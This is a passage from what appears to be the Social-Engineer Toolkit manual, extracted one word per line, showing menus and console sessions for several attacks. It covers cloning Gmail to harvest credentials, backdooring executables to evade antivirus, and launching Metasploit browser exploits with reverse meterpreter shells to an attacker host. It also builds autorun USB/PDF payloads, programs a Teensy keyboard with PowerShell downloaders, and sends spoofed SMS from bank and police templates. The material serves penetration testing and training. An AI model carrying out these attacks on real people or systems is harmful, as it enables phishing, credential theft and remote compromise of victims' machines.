"GET
/index2.html
HTTP/1.1"
200
-
[*]
WE
GOT
A
HIT!
Printing
the
output:
PARAM:
ltmpl=default
PARAM:
ltmplcache=2
PARAM:
continue=https://mail.google.com/mail/?
PARAM:
service=mail
PARAM:
rm=false
PARAM:
dsh=-7017428156907423605
PARAM:
ltmpl=default
PARAM:
ltmpl=default
PARAM:
scc=1
PARAM:
ss=1
PARAM:
timeStmp=
PARAM:
secTok=
PARAM:
GALX=0JsVTaj70sk
POSSIBLE
USERNAME
FIELD
FOUND:
Email=thisismyusername
POSSIBLE
PASSWORD
FIELD
FOUND:
Passwd=thisismypassword
PARAM:
rmShown=1
PARAM:
signIn=Sign+in
PARAM:
asts=
[*]
WHEN
YOUR
FINISHED.
HIT
CONTROL-C
TO
GENERATE
A
REPORT
The
multi-attack
web
vector
is
new
to
0.7.1
and
will
allow
you
to
specify
multiple
web
attack
methods
in
order
to
perform
a
single
attack.
In
some
scenarios,
the
Java
Applet
may
fail
however
an
internet
explorer
exploit
would
be
successful.
Or
maybe
the
Java
Applet
and
the
Internet
Explorer
exploit
fail
and
the
credential
harvester
is
successful.
The
multi-attack
vector
allows
you
to
turn
on
and
off
different
vectors
and
combine
the
attacks
all
into
one
specific
webpage.
So
when
the
user
clicks
the
link
he
will
be
targeted
by
each
of
the
attack
vectors
you
specify.
One
thing
to
note
with
the
attack
vector
is
you
cant
utilize
Tabnabbing,
Cred
Harvester,
or
Web
Jacking
with
the
Man
Left
in
the
Middle
attack.
Based
on
the
attack
vectors
they
irc.freenode.net #social-engineer
39
shouldnt
be
combined
anyways.
Lets
take
a
look
at
the
multi
attack
vector.
In
this
scenario
Im
going
to
turn
on
the
Java
Applet
attack,
Metasploit
Client-Side
exploit,
and
the
Web
Jacking
attack.
When
the
victim
browses
the
site,
he/she
will
need
to
click
on
the
link
and
will
be
bombarded
with
credential
harvester,
Metasploit
exploits,
and
the
java
applet
attack.
Im
going
to
intentionally
select
an
Internet
Explorer
7
exploit
and
browse
utilizing
IE6
just
to
demonstrate
if
one
fails,
we
have
other
methods.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
7
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*************************************************************]
irc.freenode.net
#social-engineer
40
Multi-Attack
Web
Attack
Vector
[*************************************************************]
The
multi
attack
vector
utilizes
each
combination
of
attacks
and
allow
the
user
to
choose
the
method
for
the
attack.
Once
you
select
one
of
the
attacks,
it
will
be
added
to
your
attack
profile
to
be
used
to
stage
the
attack
vector.
When
your
finished
be
sure
to
select
the
'Im
finished'
option.
Select
which
attacks
you
want
to
use:
1.
The
Java
Applet
Attack
Method
(OFF)
2.
The
Metasploit
Browser
Exploit
Method
(OFF)
3.
Credential
Harvester
Attack
Method
(OFF)
4.
Tabnabbing
Attack
Method
(OFF)
5.
Man
Left
in
the
Middle
Attack
Method
(OFF)
6.
Web
Jacking
Attack
Method
(OFF)
7.
Use
them
all
-
A.K.A.
'Tactical
Nuke'
8.
I'm
finished
and
want
proceed
with
the
attack.
9.
Return
to
main
menu.
Enter
your
choice
one
at
a
time
(hit
8
or
enter
to
launch):
1
Turning
the
Java
Applet
Attack
Vector
to
ON
Option
added.
Press
{return}
to
add
or
prepare
your
next
attack.
[*************************************************************]
Multi-Attack
Web
Attack
Vector
[*************************************************************]
The
multi
attack
vector
utilizes
each
combination
of
attacks
and
allow
the
user
to
choose
the
method
for
the
attack.
Once
you
select
one
of
the
attacks,
it
will
be
added
to
your
attack
profile
to
be
used
to
stage
the
attack
vector.
When
your
finished
be
sure
to
select
the
'Im
finished'
option.
Select
which
attacks
you
want
to
use:
1.
The
Java
Applet
Attack
Method
(ON)
2.
The
Metasploit
Browser
Exploit
Method
(OFF)
3.
Credential
Harvester
Attack
Method
(OFF)
4.
Tabnabbing
Attack
Method
(OFF)
irc.freenode.net
#social-engineer
41
5.
Man
Left
in
the
Middle
Attack
Method
(OFF)
6.
Web
Jacking
Attack
Method
(OFF)
7.
Use
them
all
-
A.K.A.
'Tactical
Nuke'
8.
I'm
finished
and
want
proceed
with
the
attack.
9.
Return
to
main
menu.
Enter
your
choice
one
at
a
time
(hit
8
or
enter
to
launch):
2
Turning
the
Metasploit
Client
Side
Attack
Vector
to
ON
Option
added.
Press
{return}
to
add
or
prepare
your
next
attack.
[*************************************************************]
Multi-Attack
Web
Attack
Vector
[*************************************************************]
The
multi
attack
vector
utilizes
each
combination
of
attacks
and
allow
the
user
to
choose
the
method
for
the
attack.
Once
you
select
one
of
the
attacks,
it
will
be
added
to
your
attack
profile
to
be
used
to
stage
the
attack
vector.
When
your
finished
be
sure
to
select
the
'Im
finished'
option.
Select
which
attacks
you
want
to
use:
1.
The
Java
Applet
Attack
Method
(ON)
2.
The
Metasploit
Browser
Exploit
Method
(ON)
3.
Credential
Harvester
Attack
Method
(OFF)
4.
Tabnabbing
Attack
Method
(OFF)
5.
Man
Left
in
the
Middle
Attack
Method
(OFF)
6.
Web
Jacking
Attack
Method
(OFF)
7.
Use
them
all
-
A.K.A.
'Tactical
Nuke'
8.
I'm
finished
and
want
proceed
with
the
attack.
9.
Return
to
main
menu.
Enter
your
choice
one
at
a
time
(hit
8
or
enter
to
launch):
6
Turning
the
Web
Jacking
Attack
Vector
to
ON
Option
added.
Press
{return}
to
add
or
prepare
your
next
attack.
[*************************************************************]
Multi-Attack
Web
Attack
Vector
irc.freenode.net
#social-engineer
42
[*************************************************************]
The
multi
attack
vector
utilizes
each
combination
of
attacks
and
allow
the
user
to
choose
the
method
for
the
attack.
Once
you
select
one
of
the
attacks,
it
will
be
added
to
your
attack
profile
to
be
used
to
stage
the
attack
vector.
When
your
finished
be
sure
to
select
the
'Im
finished'
option.
Select
which
attacks
you
want
to
use:
1.
The
Java
Applet
Attack
Method
(ON)
2.
The
Metasploit
Browser
Exploit
Method
(ON)
3.
Credential
Harvester
Attack
Method
(ON)
4.
Tabnabbing
Attack
Method
(OFF)
5.
Man
Left
in
the
Middle
Attack
Method
(OFF)
6.
Web
Jacking
Attack
Method
(ON)
7.
Use
them
all
-
A.K.A.
'Tactical
Nuke'
8.
I'm
finished
and
want
proceed
with
the
attack.
9.
Return
to
main
menu.
Enter
your
choice
one
at
a
time
(hit
8
or
enter
to
launch):
Conversely
you
can
use
the
Tactical
Nuke
option,
which
is
option
7
that
will
enable
all
of
the
attack
vectors
automatically
for
you.
In
this
example
you
can
see
the
flags
change
and
the
Java
Applet,
Metasploit
Browser
Exploit,
Credential
Harvester,
and
Web
Jacking
attack
methods
have
all
been
enabled.
In
order
to
proceed
hit
enter
or
use
option
8.
Enter
your
choice
one
at
a
time
(hit
8
or
enter
to
launch):
What
payload
do
you
want
to
generate:
Name:
Description:
1.
Windows
Shell
Reverse_TCP
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Reverse_TCP
Meterpreter
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
3.
Windows
Reverse_TCP
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Bind
Shell
Execute
payload
and
create
an
accepting
port
on
remote
system.
5.
Windows
Bind
Shell
X64
Windows
x64
Command
Shell,
Bind
TCP
Inline
6.
Windows
Shell
Reverse_TCP
X64
Windows
X64
Command
Shell,
Reverse
TCP
Inline
irc.freenode.net #social-engineer
43
7.
Windows
Meterpreter
Reverse_TCP
X64
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
8.
Windows
Meterpreter
Egress
Buster
Spawn
a
meterpreter
shell
and
find
a
port
home
via
multiple
ports
9.
Import
your
own
executable
Specify
a
path
for
your
own
executable
Enter
choice
(hit
enter
for
default):
Below
is
a
list
of
encodings
to
try
and
bypass
AV.
Select
one
of
the
below,
'backdoored
executable'
is
typically
the
best.
1.
avoid_utf8_tolower
(Normal)
2.
shikata_ga_nai
(Very
Good)
3.
alpha_mixed
(Normal)
4.
alpha_upper
(Normal)
5.
call4_dword_xor
(Normal)
6.
countdown
(Normal)
7.
fnstenv_mov
(Normal)
8.
jmp_call_additive
(Normal)
9.
nonalpha
(Normal)
10.
nonupper
(Normal)
11.
unicode_mixed
(Normal)
12.
unicode_upper
(Normal)
13.
alpha2
(Normal)
14.
No
Encoding
(None)
15.
Multi-Encoder
(Excellent)
16.
Backdoored
Executable
(BEST)
Enter
your
choice
(enter
for
default):
[-]
Enter
the
PORT
of
the
listener
(enter
for
default):
[-]
Backdooring
a
legit
executable
to
bypass
Anti-Virus.
Wait
a
few
seconds...
[-]
Backdoor
completed
successfully.
Payload
is
now
hidden
within
a
legit
executable.
********************************************************
Do
you
want
to
create
a
Linux/OSX
reverse_tcp
payload
in
the
Java
Applet
attack
as
well?
********************************************************
Enter
choice
yes
or
no:
no
Enter
the
browser
exploit
you
would
like
to
use
1.
Internet
Explorer
CSS
Tags
Memory
Corruption
irc.freenode.net
#social-engineer
44
2.
Sun
Java
Runtime
New
Plugin
docbase
Buffer
Overflow
3.
Microsoft
Windows
WebDAV
Application
DLL
Hijacker
4.
Adobe
Shockwave
rcsL
Memory
Corruption
Exploit
5.
Adobe
CoolType
SING
Table
"uniqueName"
Stack
Buffer
Overflow
6.
Apple
QuickTime
7.6.7
_Marshaled_pUnk
Code
Execution
7.
Microsoft
Help
Center
XSS
and
Command
Execution
(MS10-042)
8.
Microsoft
Internet
Explorer
iepeers.dll
Use
After
Free
(MS10-018)
9.
Microsoft
Internet
Explorer
Tabular
Data
Control
Exploit
(MS10-018)
10.
Microsoft
Internet
Explorer
"Aurora"
Memory
Corruption
(MS10-002)
11.
Microsoft
Internet
Explorer
7
Uninitialized
Memory
Corruption
(MS09-
002)
12.
Microsoft
Internet
Explorer
Style
getElementsbyTagName
Corruption
(MS09-072)
13.
Microsoft
Internet
Explorer
isComponentInstalled
Overflow
14.
Microsoft
Internet
Explorer
Explorer
Data
Binding
Corruption
(MS08-078)
15.
Microsoft
Internet
Explorer
Unsafe
Scripting
Misconfiguration
16.
FireFox
3.5
escape
Return
Value
Memory
Corruption
17.
Metasploit
Browser
Autopwn
(USE
AT
OWN
RISK!)
Enter
your
choice
(1-17)
(enter
for
default):
8
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
[*]
Injecting
Java
Applet
attack
into
the
newly
cloned
website.
[*]
Filename
obfuscation
complete.
Payload
name
is:
x5sKAzS
[*]
Malicious
java
applet
website
prepped
for
deployment
[*]
Injecting
iframes
into
cloned
website
for
MSF
Attack....
[*]
Malicious
iframe
injection
successful...crafting
payload.
[*]
Launching
MSF
Listener...
[*]
This
may
take
a
few
to
load
MSF...
[-]
***
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
o
8
o
o
8
8
8
ooYoYo.
.oPYo.
o8P
.oPYo.
.oPYo.
.oPYo.
8
.oPYo.
o8
o8P
8'
8
8
8oooo8
8
.oooo8
Yb..
8
8
8
8
8
8
8
8
8
8
8.
8
8
8
'Yb.
8
8
8
8
8
8
8
8
8
8
`Yooo'
8
`YooP8
`YooP'
8YooP'
8
`YooP'
8
8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
irc.freenode.net
#social-engineer
45
=[
metasploit
v3.4.2-dev
[core:3.4
api:1.0]
+
--
--=[
588
exploits
-
300
auxiliary
+
--
--=[
224
payloads
-
27
encoders
-
8
nops
=[
svn
r10268
updated
today
(2010.09.09)
resource
(src/program_junk/meta_config)>
use
windows/browser/ms09_002_memory_corruption
resource
(src/program_junk/meta_config)>
set
PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD
=>
windows/meterpreter/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
172.16.32.129
LHOST
=>
172.16.32.129
resource
(src/program_junk/meta_config)>
set
LPORT
443
LPORT
=>
443
resource
(src/program_junk/meta_config)>
set
URIPATH
/
URIPATH
=>
/
resource
(src/program_junk/meta_config)>
set
SRVPORT
8080
SRVPORT
=>
8080
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
msf
exploit(ms09_002_memory_corruption)
>
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Using
URL:
http://0.0.0.0:8080/
[*]
Local
IP:
http://172.16.32.129:8080/
[*]
Server
started.
Now
that
we
have
everything
running,
lets
browse
to
the
website
and
see
whats
there.
We
first
get
greeted
with
the
site
has
been
moved
irc.freenode.net #social-engineer
46
We
click
the
link
and
we
are
hit
with
a
Metasploit
exploit,
look
at
the
handler
on
the
backend.
[*]
Sending
Internet
Explorer
7
CFunctionPointer
Uninitialized
Memory
Corruption
to
172.16.32.131:1329...
msf
exploit(ms09_002_memory_corruption)
>
This
exploit
fails
because
we
are
using
internet
explorer
6,
once
this
fails,
check
out
the
victims
screen:
irc.freenode.net #social-engineer
47
We
hit
run,
and
we
have
a
meterpreter
shell.
In
this
instance
we
would
be
redirected
back
to
the
original
Google
because
the
attack
was
successful.
If
you
also
notice,
when
using
the
Java
Applet
we
automatically
migrate
to
a
separate
thread
(process)
and
happens
to
be
notepad.exe.
Reason
being
is
if
the
victim
closes
the
browser,
we
will
be
safe
and
the
process
wont
terminate
our
meterpreter
shell.
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1333)
at
Thu
Sep
09
12:33:20
-0400
2010
[*]
Session
ID
1
(172.16.32.129:443
->
172.16.32.131:1333)
processing
InitialAutoRunScript
'migrate
-f'
[*]
Current
server
process:
java.exe
(824)
[*]
Spawning
a
notepad.exe
host
process...
[*]
Migrating
into
process
ID
3044
[*]
New
server
process:
notepad.exe
(3044)
msf
exploit(ms09_002_memory_corruption)
>
Lets
say
that
this
attack
failed
and
the
user
hit
cancel.
He
would
then
be
prompted
to
enter
his/her
username
and
password
into
the
username/password
field.
[*]
WE
GOT
A
HIT!
Printing
the
output:
PARAM:
ltmpl=default
PARAM:
ltmplcache=2
PARAM:
continue=https://mail.google.com/mail/?ui=html
PARAM:
zy=l
PARAM:
service=mail
PARAM:
rm=false
PARAM:
dsh=-8578216484479049837
PARAM:
ltmpl=default
PARAM:
ltmpl=default
PARAM:
scc=1
PARAM:
ss=1
PARAM:
timeStmp=
PARAM:
secTok=
PARAM:
GALX=fYQL_bXkbzU
POSSIBLE
USERNAME
FIELD
FOUND:
Email=thisismyusername
POSSIBLE
PASSWORD
FIELD
FOUND:
Passwd=thisismypassword
PARAM:
rmShown=1
PARAM:
signIn=Sign+in
PARAM:
asts=
[*]
WHEN
YOUR
FINISHED.
HIT
CONTROL-C
TO
GENERATE
A
REPORT
irc.freenode.net #social-engineer
48
49
1.
File-Format
Exploits
2.
Standard
Metasploit
Executable
Enter
your
numeric
choice
(return
for
default):
1
Enter
the
IP
address
for
the
reverse
connection
(payload):
172.16.32.129
Select
the
file
format
exploit
you
want.
The
default
is
the
PDF
embedded
EXE.
**********
PAYLOADS
**********
1.
SET
Custom
Written
DLL
Hijacking
Attack
Vector
(RAR,
ZIP)
2.
Adobe
Flash
Player
'Button'
Remote
Code
Execution
3.
Adobe
CoolType
SING
Table
'uniqueName'
Overflow
4.
Adobe
Flash
Player
'newfunction'
Invalid
Pointer
Use
5.
Adobe
Collab.collectEmailInfo
Buffer
Overflow
6.
Adobe
Collab.getIcon
Buffer
Overflow
7.
Adobe
JBIG2Decode
Memory
Corruption
Exploit
8.
Adobe
PDF
Embedded
EXE
Social
Engineering
9.
Adobe
util.printf()
Buffer
Overflow
10.
Custom
EXE
to
VBA
(sent
via
RAR)
(RAR
required)
11.
Adobe
U3D
CLODProgressiveMeshDeclaration
Array
Overrun
12.
Adobe
PDF
Embedded
EXE
Social
Engineering
(NOJS)
Enter
the
number
you
want
(press
enter
for
default):
1
1.
Windows
Reverse
TCP
Shell
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Meterpreter
Reverse_TCP
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
irc.freenode.net
#social-engineer
50
3.
Windows
Reverse
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Reverse
TCP
Shell
(x64)
Windows
X64
Command
Shell,
Reverse
TCP
Inline
5.
Windows
Meterpreter
Reverse_TCP
(X64)
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
6.
Windows
Shell
Bind_TCP
(X64)
Execute
payload
and
create
an
accepting
port
on
remote
system.
7.
Windows
Meterpreter
Reverse
HTTPS
Tunnel
communication
over
HTTP
using
SSL
and
use
Meterpreter
Enter
the
payload
you
want
(press
enter
for
default):
[*]
Windows
Meterpreter
Reverse
TCP
selected.
Enter
the
port
to
connect
back
on
(press
enter
for
default):
[*]
Defaulting
to
port
443...
[*]
Generating
fileformat
exploit...
[*]
Please
wait
while
we
load
the
module
tree...
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Creating
'template.pdf'
file...
[*]
Generated
output
file
/pentest/exploits/set/src/program_junk/template.pdf
[*]
Payload
creation
complete.
[*]
All
payloads
get
sent
to
the
src/program_junk/template.pdf
directory
[*]
Payload
generation
complete.
Press
enter
to
continue.
[*]
Your
attack
has
been
created
in
the
SET
home
directory
folder
"autorun"
[*]
Copy
the
contents
of
the
folder
to
a
CD/DVD/USB
to
autorun.
Do
you
want
to
create
a
listener
right
now
yes
or
no:
yes
[-]
***
irc.freenode.net
#social-engineer
51
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
_
_
_
|
|
(_)_
____
____|
|_
____
___
____
|
|
___
_|
|_
|
\
/
_
)
_)/
_
|/___)
_
\|
|/
_
\|
|
_)
|
|
|
(
(/
/|
|_(
(
|
|___
|
|
|
|
|
|_|
|
|
|__
|_|_|_|\____)\___)_||_(___/|
||_/|_|\___/|_|\___)
|_|
resource
(/pentest/exploits/set/src/program_junk/meta_config)>
use
multi/handler
resource
(/pentest/exploits/set/src/program_junk/meta_config)>
set
payload
windows/meterpreter/reverse_tcp
payload
=>
windows/meterpreter/reverse_tcp
resource
(/pentest/exploits/set/src/program_junk/meta_config)>
set
lhost
172.16.32.129
lhost
=>
172.16.32.129
resource
(/pentest/exploits/set/src/program_junk/meta_config)>
set
lport
443
lport
=>
443
resource
(/pentest/exploits/set/src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
msf
exploit(handler)
>
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Starting
the
payload
handler...
In
this
example
we
specified
a
file
format
attack
in
order
to
create
the
infectious
USB/DVD/CD.
A
folder
is
created
called
SET
in
the
root
of
the
SET
directory
that
contains
the
components
you
will
need
to
copy
over
to
the
media
device
of
your
irc.freenode.net
#social-engineer
52
choosing.
Once
inserted,
the
file
format
exploit
would
trigger
an
overflow
and
if
they
were
susceptible,
it
would
completely
compromise
their
system
with
a
meterpreter
shell.
If
we
would
have
selected
the
executable
section,
it
will
have
been
the
same
avenues
as
previously
walked
through
in
this
chapter
but
instead
of
triggering
an
exploit,
it
would
trigger
an
executable.
When
doing
an
ls
al
in
the
SET
directory
you
should
notice
that
there
is
an
autorun
folder.
Burn
the
contents
of
that
directory
to
a
DVD
or
write
to
a
USB
device.
Once
inserted
you
would
be
presented
with
a
shell.
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1333)
at
Thu
Sep
09
12:42:32
-0400
2010
[*]
Session
ID
1
(172.16.32.129:443
->
172.16.32.131:1333)
processing
InitialAutoRunScript
'migrate
-f'
[*]
Current
server
process:
java.exe
(824)
[*]
Spawning
a
notepad.exe
host
process...
[*]
Migrating
into
process
ID
3044
[*]
New
server
process:
notepad.exe
(3044)
msf
exploit(ms09_002_memory_corruption)
>
53
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
6
Welcome
to
the
Teensy
HID
Attack
Vector.
Special
thanks
to:
IronGeek
and
WinFang
The
Teensy
HID
Attack
Vector
utilizes
the
teensy
USB
device
to
program
the
device
to
act
as
a
keyboard.
Teensy's
have
onboard
storage
and
can
allow
for
remote
code
execution
on
the
physical
system.
Since
the
devices
are
registered
as
USB
Keyboard's
it
will
bypass
any
autorun
disabled
or
endpoint
protection
on
the
system.
You
will
need
to
purchase
the
Teensy
USB
device,
it's
roughly
$22
dollars.
This
attack
vector
will
auto
generate
the
code
needed
in
order
to
deploy
the
payload
on
the
system
for
you.
This
attack
vector
will
create
the
.pde
files
necessary
to
import
into
Arduino
(the
IDE
used
for
programming
the
Teensy).
The
attack
vectors
range
from
Powershell
based
downloaders,
wscript
attacks,
and
other
methods.
For
more
information
on
specifications
and
good
tutorials
visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-
keystroke-dongle
To
purchase
a
Teensy,
visit:
http://www.pjrc.com/store/teensy.html
Select
a
payload
to
create
the
pde
file
to
import
into
Arduino:
1.
Powershell
HTTP
GET
MSF
Payload
2.
WSCRIPT
HTTP
GET
MSF
Payload
3.
Powershell
based
Reverse
Shell
irc.freenode.net
#social-engineer
54
4.
Return
to
the
main
menu.
Enter
your
choice:
2
Do
you
want
to
create
a
payload
and
listener
yes
or
no:
yes
What
payload
do
you
want
to
generate:
Name:
Description:
1.
Windows
Shell
Reverse_TCP
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Reverse_TCP
Meterpreter
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
3.
Windows
Reverse_TCP
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Bind
Shell
Execute
payload
and
create
an
accepting
port
on
remote
system.
5.
Windows
Bind
Shell
X64
Windows
x64
Command
Shell,
Bind
TCP
Inline
6.
Windows
Shell
Reverse_TCP
X64
Windows
X64
Command
Shell,
Reverse
TCP
Inline
7.
Windows
Meterpreter
Reverse_TCP
X64
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
8.
Windows
Meterpreter
Egress
Buster
Spawn
a
meterpreter
shell
and
find
a
port
home
via
multiple
ports
9.
Import
your
own
executable
Specify
a
path
for
your
own
executable
Enter
choice
(hit
enter
for
default):
Below
is
a
list
of
encodings
to
try
and
bypass
AV.
Select
one
of
the
below,
'backdoored
executable'
is
typically
the
best.
1.
avoid_utf8_tolower
(Normal)
2.
shikata_ga_nai
(Very
Good)
3.
alpha_mixed
(Normal)
4.
alpha_upper
(Normal)
5.
call4_dword_xor
(Normal)
6.
countdown
(Normal)
7.
fnstenv_mov
(Normal)
8.
jmp_call_additive
(Normal)
9.
nonalpha
(Normal)
10.
nonupper
(Normal)
11.
unicode_mixed
(Normal)
12.
unicode_upper
(Normal)
13.
alpha2
(Normal)
14.
No
Encoding
(None)
irc.freenode.net
#social-engineer
55
15.
Multi-Encoder
(Excellent)
16.
Backdoored
Executable
(BEST)
Enter
your
choice
(enter
for
default):
[-]
Enter
the
PORT
of
the
listener
(enter
for
default):
[-]
Backdooring
a
legit
executable
to
bypass
Anti-Virus.
Wait
a
few
seconds...
[-]
Backdoor
completed
successfully.
Payload
is
now
hidden
within
a
legit
executable.
[*]
PDE
file
created.
You
can
get
it
under
'reports/teensy.pde'
[*]
Be
sure
to
select
"Tools",
"Board",
and
"Teensy
2.0
(USB/KEYBOARD)"
in
Arduino
Press
enter
to
continue.
[*]
Launching
MSF
Listener...
[*]
This
may
take
a
few
to
load
MSF...
[-]
***
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
____________
<
metasploit
>
------------
\
,__,
\
(oo)____
(__)
)\
||--||
*
=[
metasploit
v3.4.2-dev
[core:3.4
api:1.0]
+
--
--=[
588
exploits
-
300
auxiliary
+
--
--=[
224
payloads
-
27
encoders
-
8
nops
=[
svn
r10268
updated
today
(2010.09.09)
resource
(src/program_junk/meta_config)>
use
exploit/multi/handler
resource
(src/program_junk/meta_config)>
set
PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD
=>
windows/meterpreter/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
0.0.0.0
LHOST
=>
0.0.0.0
resource
(src/program_junk/meta_config)>
set
LPORT
443
LPORT
=>
443
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
irc.freenode.net
#social-engineer
56
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
msf
exploit(handler)
>
[*]
Started
reverse
handler
on
0.0.0.0:443
[*]
Starting
the
payload
handler...
Now
that
we
have
everything
ready,
SET
exports
a
file
called
teensy.pde
to
the
reports/
folder.
Copy
that
reports
folder
to
wherever
you
have
Arduino
installed.
With
this
attack,
follow
the
instructions
at
PRJC
on
how
to
upload
your
code
to
the
Teensy
board,
its
relatively
simple
you
just
need
to
install
the
Teensy
Loader
and
the
Teensy
libraries.
Once
you
do
that
you
will
have
an
IDE
interface
called
Arduino.
One
of
the
MOST
important
aspects
of
this
is
to
ensure
you
set
your
board
to
a
Teensy
USB
Keyboard/Mouse.
Once
you
have
this
selected,
drag
your
pde
file
into
the
Arduino
interface.
Arduino/Teensy
supports
Linux,
OSX,
and
Windows.
Insert
your
USB
device
into
irc.freenode.net #social-engineer
57
the
computer
and
upload
your
code.
This
will
program
your
device
with
the
SET
generated
code.
Below
is
uploading
and
the
code.
Once
the
USB
device
is
inserted
on
the
victim
machine,
once
finished
you
should
be
presented
with
a
meterpreter
shell.
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1333)
at
Thu
Sep
09
12:52:32
-0400
2010
[*]
Session
ID
1
(172.16.32.129:443
->
172.16.32.131:1333)
processing
InitialAutoRunScript
'migrate
-f'
[*]
Current
server
process:
java.exe
(824)
[*]
Spawning
a
notepad.exe
host
process...
[*]
Migrating
into
process
ID
3044
[*]
New
server
process:
notepad.exe
(3044)
msf
exploit(ms09_002_memory_corruption)
>
irc.freenode.net #social-engineer
58
59
1.
SMS
Attack
Single
Phone
Number
2.
SMS
Attack
Mass
SMS
3.
Return
to
SMS
Spoofing
Menu
Enter
your
choice:
1
Single
SMS
Attack
Enter
who
you
want
to
send
sms
to:
5555555555
Do
you
want
to
use
a
predefined
template
or
craft
a
one
time
SMS.
1.
Pre-Defined
Template
2.
One-Time
Use
SMS
3.
Cancel
and
return
to
SMS
Spoofing
Menu
Enter
your
choice:
1
Below
is
a
list
of
available
templates:
1:
MRW:
pedido
no
entregado
2:
Boss
Fake
3:
Movistar:
publicidad
nokia
gratis
4:
Movistar:
publicidad
tarifa
llamada
5:
TMB:
temps
espera
6:
Movistar:
publicidad
ROCKRIO
7:
Movistar:
publicidad
verano
internet
8:
Vodafone
Fool
9:
Police
Fake
10:
Movistar:
publicidad
navidad
11:
Yavoy:
regalo
yavoy
12:
Movistar:
oferta
otoo
13:
Movistar:
publicidad
tarifa
sms
14:
teabla:
moviles
gratis
15:
Movistar:
publicidad
aramon
16:
Movistar:
publicidad
nieve
17:
Vodafone:
publicidad
nuevo
contrato
18:
ruralvia:
confirmacion
de
transferencia
19:
Ministerio
vivienda:
incidencia
pago
20:
Tu
Banco:
visa
disponible
en
oficina
Enter
the
number
you
want
to
use:
2
Service
Selection
irc.freenode.net
#social-engineer
60
There
are
diferent
services
you
can
use
for
the
SMS
spoofing,
select
your
own.
What
do
you
want
to
do:
1.
SohoOS
(buggy)
2.
Lleida.net
(pay)
3.
SMSGANG
(pay)
4.
Android
Emulator
(need
to
install
Android
Emulator)
5.
Cancel
and
return
to
SMS
Spoofing
Menu
Enter
your
choice:
1
SMS
sent
SET
has
completed.
SET Automation
SET
has
a
feature
called
set-automate
which
will
take
an
answer
file
(explained
in
a
second)
and
enter
the
commands
in
the
menu
mode
for
you.
For
example
in
prior
walkthroughs
you
have
to
enter
each
menu
each
time
you
prep
the
attack.
So
for
example
if
I
wanted
to
do
the
Java
Applet
I
would
do
this:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
